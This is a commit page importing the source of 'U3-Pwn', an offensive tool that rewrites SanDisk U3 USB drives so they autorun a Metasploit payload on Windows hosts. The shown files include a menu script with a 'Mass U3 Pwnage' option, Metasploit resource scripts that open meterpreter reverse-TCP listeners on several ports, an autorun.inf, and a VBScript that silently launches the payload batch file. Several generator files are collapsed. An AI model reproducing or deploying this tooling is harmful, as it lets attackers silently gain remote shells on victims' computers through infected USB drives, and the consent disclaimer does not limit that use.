Commit 017edb4d authored by Devon Kearns's avatar Devon Kearns

Imported Upstream version 0.1

parents
################################################################################
# ____ _ __ #
# ___ __ __/ / /__ ___ ______ ______(_) /___ __ #
# / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
# /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / #
# /___/ team #
# #
# U3-Pwn #
# #
# DATE #
# 06/27/2012 #
# #
# DESCRIPTION #
# U3-Pwn is a tool designed to automate injecting executables to Sandisk #
# smart usb devices with default U3 software install. This is performed by #
# removing the original iso file from the device and creating a new iso #
# with autorun features. #
# #
# REQUREMENTS #
# - Metasploit #
# - U3-Tool #
# - Python-2.6 #
# #
# AUTHOR #
# Zy0d0x - http://www.nullsecurity.net/ #
# #
################################################################################
Ubuntu:
apt-get install u3-tool
x32
wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run
chmod 755 metasploit-latest-linux-installer.run
./metasploit-latest-linux-installer.run
x64
wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
chmod 755 metasploit-latest-linux-x64-installer.run
./metasploit-latest-linux-x64-installer.run
Then cd U3-Pwn && python U3-pwn.py
#!/usr/bin/env python
# -*- coding: latin-1 -*- ######################################################
# ____ _ __ #
# ___ __ __/ / /__ ___ ______ ______(_) /___ __ #
# / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
# /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / #
# /___/ team #
# #
# U3-Pwn.py #
# #
# DATE #
# 06/27/2012 #
# #
# DESCRIPTION #
# U3-Pwn is a tool designed to automate injecting executables to Sandisk #
# smart usb devices with default U3 software install. This is performed by #
# removing the original iso file from the device and creating a new iso #
# with autorun features. #
# #
# REQUREMENTS #
# - Metasploit #
# - U3-Tool #
# - Python-2.6 #
# #
# AUTHOR #
# Zy0d0x - http://www.nullsecurity.net/ #
# #
################################################################################
try:
import subprocess
import time
import os
import sys
import pexpect
import banner
except ImportError:
pass
definepath = os.getcwd()
sys.path.append('%s/src/' % definepath)
import banner
try:
while 1 == 1:
banner.print_banner()
mainmenu = \
raw_input('''
U3-Pwn Main Menu:
1. Generate & Replace Iso Image.
2. Generate & Replace With Custom Exe.
3. Mass U3 Pwnage - Multi device attack.
4. Find Out U3 SanDisk Device Information.
5. Replace Iso Image With Original U3 Iso.
6. About U3-Pwn & Disclaimer.
7. Exit U3-Pwn.
Enter the number: ''')
# Generate Single Iso & Replace Iso on SanDisk Device
if mainmenu == '1':
try:
sys.path.append('%s/src/' % definepath)
try:
reload(generator)
except Exception:
pass
import generator
except KeyboardInterrupt:
print '''[-]Returning to previous menu...'''
time.sleep(2)
# Generate Single Iso & Replace Iso With Custom Exe on SanDisk Device
if mainmenu == '2':
try:
sys.path.append('%s/src/' % definepath)
try:
reload(customexe)
except Exception:
pass
import customexe
except KeyboardInterrupt:
print '''[-]Returning to previous menu...'''
time.sleep(2)
# Generate Single Iso & Replace Iso on Multiple SanDisk Device
if mainmenu == '3':
try:
sys.path.append('%s/src/' % definepath)
try:
reload(masspwnage)
except Exception:
pass
import masspwnage
except KeyboardInterrupt:
print '''[-]Returning to previous menu...'''
time.sleep(2)
# Get SanDisk Device Information
if mainmenu == '4':
try:
sys.path.append('%s/src/' % definepath)
try:
reload(deviceinfo)
except Exception:
pass
import deviceinfo
except KeyboardInterrupt:
print '''[-]Returning to previous menu...'''
time.sleep(2)
# Replace Backdoored SanDisk Device With Original Iso File
if mainmenu == '5':
try:
sys.path.append('%s/src/' % definepath)
try:
reload(backup)
except Exception:
pass
import backup
except KeyboardInterrupt:
print '''[-]Returning to previous menu...'''
time.sleep(2)
# About & Disclaimer
if mainmenu == '6':
try:
try:
reload(about)
except Exception:
import about
except KeyboardInterrupt:
print '''[-]Returning to previous menu...'''
time.sleep(2)
if mainmenu == '7':
sys.exit()
except KeyboardInterrupt:
# Error handling
print '''[-]Exiting U3-Pwn...'''
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp_allports
set LHOST 0.0.0.0
exploit -j
set LPORT 2
exploit -j
\ No newline at end of file
use multi/handler
set payload windows/meterpreter/reverse_tcp_allports
set LPORT 1
set LHOST 0.0.0.0
exploit -j
set LPORT 2
exploit -j
set LPORT 3
exploit -j
set LPORT 4
exploit -j
use multi/handler
set payload windows/meterpreter/reverse_tcp_allports
set LPORT 1
set LHOST 0.0.0.0
exploit -j
set LPORT 2
exploit -j
set LPORT 3
exploit -j
set LPORT 4
exploit -j
exploit -j
set LPORT 5
exploit -j
set LPORT 6
exploit -j
[AutoRun]
open=wscript.exe hidden.vbs LaunchU3.bat
icon=icon.ico
action=Run U3 Launchpad
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "LaunchU3.bat" & Chr(34), 0
Set WshShell = Nothing
#!/usr/bin/env python
# -*- coding: latin-1 -*- ######################################################
# ____ _ __ #
# ___ __ __/ / /__ ___ ______ ______(_) /___ __ #
# / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
# /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / #
# /___/ team #
# #
# about.py #
# #
# DATE #
# 06/27/2012 #
# #
# DESCRIPTION #
# U3-Pwn is a tool designed to automate injecting executables to Sandisk #
# smart usb devices with default U3 software install. This is performed by #
# removing the original iso file from the device and creating a new iso #
# with autorun features. #
# #
# REQUREMENTS #
# - Metasploit #
# - U3-Tool #
# - Python-2.6 #
# #
# AUTHOR #
# Zy0d0x - http://www.nullsecurity.net/ #
# #
################################################################################
import os
import sys
import banner
definepath = os.getcwd()
sys.path.append('%s/src/' % definepath)
banner.print_banner()
print '''
U3-Pwn is a tool designed to automate injecting executerbles to Sandisk
smart usb devices with default U3 software install. This is performed by
removing the original iso file from the device and creating a new iso
with autorun features.
Written by: Michael Johnson (Zy0d0x) @ http://www.nullsecurity.net
Submit Bugs:zy0d0x at nullsecurity.net
DISCLAIMER: This is only for testing purposes and can only be used where,
strict consent has been given. Do not use this for illegal purposes period.
'''
raw_input(''' Press any key to return to menu: ''')
#!/usr/bin/env python
# -*- coding: latin-1 -*- ######################################################
# ____ _ __ #
# ___ __ __/ / /__ ___ ______ ______(_) /___ __ #
# / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
# /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / #
# /___/ team #
# #
# backup.py #
# #
# DATE #
# 06/27/2012 #
# #
# DESCRIPTION #
# U3-Pwn is a tool designed to automate injecting executables to Sandisk #
# smart usb devices with default U3 software install. This is performed by #
# removing the original iso file from the device and creating a new iso #
# with autorun features. #
# #
# REQUREMENTS #
# - Metasploit #
# - U3-Tool #
# - Python-2.6 #
# #
# AUTHOR #
# Zy0d0x - http://www.nullsecurity.net/ #
# #
################################################################################
try:
import subprocess
import pexpect
import time
import os
import sys
import shutil
except ImportError:
pass
definepath = os.getcwd()
sys.path.append('%s/src/' % definepath)
import banner
try:
banner.print_banner()
choice = \
raw_input('''\n How many devices would you like to revert to original U3 software 1,2,4,6,: '''
)
if choice == '':
choice = '1'
if choice == '1':
device1 = \
raw_input('''\n Enter the device to change iso image on (example /dev/sde1): '''
)
if device1 == '':
print ''' [-]Device Missing'''
else:
print '''\n Replacing Iso File Please Wait...'''
child1 = pexpect.spawn('u3-tool -v -p 8060928 ' + device1)
child1.sendline('y')
time.sleep(5)
subprocess.Popen('u3-tool -l backup/origU3/U3\ System.iso %s'
% device1, shell=True).wait()
print ''' Backup Complete Returning To Menu...'''
time.sleep(2)
if choice == '2':
device1 = \
raw_input('''\n Enter the device to change iso image on (example /dev/sde1): '''
)
device2 = raw_input('''\n Enter next device: ''')
if device1 == '' or device2 == '':
print 'Device Missing'
time.sleep(2)
else:
print '''\n Replacing Iso File Please Wait...'''
child1 = pexpect.spawn('u3-tool -v -p 8060928 ' + device1)
child1.sendline('y')
child1 = pexpect.spawn('u3-tool -v -p 8060928 ' + device2)
child1.sendline('y')
time.sleep(5)
subprocess.Popen('u3-tool -l backup/origU3/U3\ System.iso %s'
% device1, shell=True).wait()
subprocess.Popen('u3-tool -l backup/origU3/U3\ System.iso %s'
% device2, shell=True).wait()
print ''' Backup Complete Returning To Menu...'''
time.sleep(2)
if choice == '4':
device1 = \
raw_input('''\n Enter the device to change iso image on (example /dev/sde1): '''
)
device2 = raw_input('''\n Enter next device: ''')
device3 = raw_input('''\n Enter next device: ''')
device4 = raw_input('''\n Enter next device: ''')
if device1 == '' or device2 == '' or device3 == '' or device4 \
== '':
print ''' Device Missing'''
time.sleep(2)
else:
print '''\n Replacing Iso File Please Wait...'''
child1 = pexpect.spawn('u3-tool -v -p 8060928 ' + device1)
child1.sendline('y')
child1 = pexpect.spawn('u3-tool -v -p 8060928 ' + device2)
child1.sendline('y')
child1 = pexpect.spawn('u3-tool -v -p 8060928 ' + device3)
child1.sendline('y')
child1 = pexpect.spawn('u3-tool -v -p 8060928 ' + device4)
child1.sendline('y')
time.sleep(5)
subprocess.Popen('u3-tool -l backup/origU3/U3\ System.iso %s'
% device1, shell=True).wait()
subprocess.Popen('u3-tool -l backup/origU3/U3\ System.iso %s'
% device2, shell=True).wait()
subprocess.Popen('u3-tool -l backup/origU3/U3\ System.iso %s'
% device3, shell=True).wait()
subprocess.Popen('u3-tool -l backup/origU3/U3\ System.iso %s'
% device4, shell=True).wait()
print ''' Backup Complete Returning To Menu...'''
time.sleep(2)
if choice == '6':
device1 = \
raw_input('''\n Enter the device to change iso image on (example /dev/sde1): '''
)
device2 = raw_input('''\n Enter next device: ''')
device3 = raw_input('''\n Enter next device: ''')
device4 = raw_input('''\n Enter next device: ''')
device5 = raw_input('''\n Enter next device: ''')
device6 = raw_input('''\n Enter next device: ''')
if device1 == '' or device2 == '' or device3 == '' or device4 \
== '' or device5 == '' or device5 == '':
print ''' [-]Device Missing'''
time.sleep(2)
else:
print '''\n Replacing Iso File Please Wait...'''
child1 = pexpect.spawn('u3-tool -v -p 8060928 ' + device1)
child1.sendline('y')
child1 = pexpect.spawn('u3-tool -v -p 8060928 ' + device2)
child1.sendline('y')
child1 = pexpect.spawn('u3-tool -v -p 8060928 ' + device3)
child1.sendline('y')
child1 = pexpect.spawn('u3-tool -v -p 8060928 ' + device4)
child1.sendline('y')
child1 = pexpect.spawn('u3-tool -v -p 8060928 ' + device5)
child1.sendline('y')
child1 = pexpect.spawn('u3-tool -v -p 8060928 ' + device6)
child1.sendline('y')
time.sleep(5)
subprocess.Popen('u3-tool -l backup/origU3/U3\ System.iso %s'
% device1, shell=True).wait()
subprocess.Popen('u3-tool -l backup/origU3/U3\ System.iso %s'
% device2, shell=True).wait()
subprocess.Popen('u3-tool -l backup/origU3/U3\ System.iso %s'
% device3, shell=True).wait()
subprocess.Popen('u3-tool -l backup/origU3/U3\ System.iso %s'
% device4, shell=True).wait()
subprocess.Popen('u3-tool -l backup/origU3/U3\ System.iso %s'
% device5, shell=True).wait()
subprocess.Popen('u3-tool -l backup/origU3/U3\ System.iso %s'
% device6, shell=True).wait()
print ''' Backup Complete Returning To Menu...'''
time.sleep(2)
except KeyboardInterrupt:
print '''[-]Keyboard Interrupt Detected, Returning To Menu.'''
time.sleep(2)
except Exception, error:
print '[-]Something went wrong, printing error message..'
print error
time.sleep(2)
sys.exit(0)
#!/usr/bin/python
# -*- coding: utf-8 -*-
try:
import os
except ImportError:
pass
def print_banner():
os.system('clear')
print '''
~ .__ \xc2\xb0.__ 0 o ^ .__ \xc2\xb0__ `\xc2\xb4
\xc2\xb0____) __ __| | | \xc2\xb0| ______\xc2\xb0____ 0 ____ __ _________|__|/ |_ ___.__.
/ \\| | \xc2\xb0\\ |\xc2\xb0| | \xc2\xb0/ ___// __ \\_/ ___\\| | \xc2\xb0\\_ __ \\ o\\ __< | |
| o\xc2\xb0| \\ | / |_| |__\\___ \\ ___/\\ \xc2\xb0\\___| o| /| | \\/ || |\xc2\xb0 \\___ O|
|___| /____/|____/____/____ \xc2\xb0>\\___ >\\___ >____/ |__|\xc2\xb0 |__||__| / ____|
`\xc2\xb4\xc2\xb4`\xc2\xb4\\/\xc2\xb4`nullsecurity team`\xc2\xb4\\/`\xc2\xb4\xc2\xb4`\xc2\xb4\\/`\xc2\xb4``\xc2\xb4\\/ ``\xc2\xb4```\xc2\xb4```\xc2\xb4\xc2\xb4\xc2\xb4\xc2\xb4`\xc2\xb4``0_o\\/\xc2\xb4\xc2\xb4`\xc2\xb4\xc2\xb4
************************************************************************
U3-Pwn Metasploit Payload Injection Tool For SanDisk Devices
************************************************************************
'''
This diff is collapsed.
#!/usr/bin/env python
# -*- coding: latin-1 -*- ######################################################
# ____ _ __ #
# ___ __ __/ / /__ ___ ______ ______(_) /___ __ #
# / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
# /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / #
# /___/ team #
# #
# deviceinfo.py #
# #
# DATE #
# 06/27/2012 #
# #
# DESCRIPTION #
# U3-Pwn is a tool designed to automate injecting executables to Sandisk #
# smart usb devices with default U3 software install. This is performed by #
# removing the original iso file from the device and creating a new iso #
# with autorun features. #
# #
# REQUREMENTS #
# - Metasploit #
# - U3-Tool #
# - Python-2.6 #
# #
# AUTHOR #
# Zy0d0x - http://www.nullsecurity.net/ #
# #
################################################################################
try:
import subprocess
import time
import sys
import os
except ImportError:
pass
definepath = os.getcwd()
sys.path.append('%s/src/' % definepath)
import banner
try:
banner.print_banner()
device = \
raw_input('''\nEnter the device to find information about (example /dev/sde1): '''
)
if device == '':
print '''[-]Error No Device Found'''
time.sleep(2)
else:
subprocess.Popen('u3-tool -D ' + device, shell=True).wait()
sys.exit(0)
except KeyboardInterrupt:
print '''[-]Keyboard Interrupt Detected, Returning To Menu....'''
time.sleep(2)
except Exception, error:
print '''[-]Something went wrong, printing error message....'''
print error
time.sleep(2)
sys.exit(0)
This diff is collapsed.
This diff is collapsed.
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment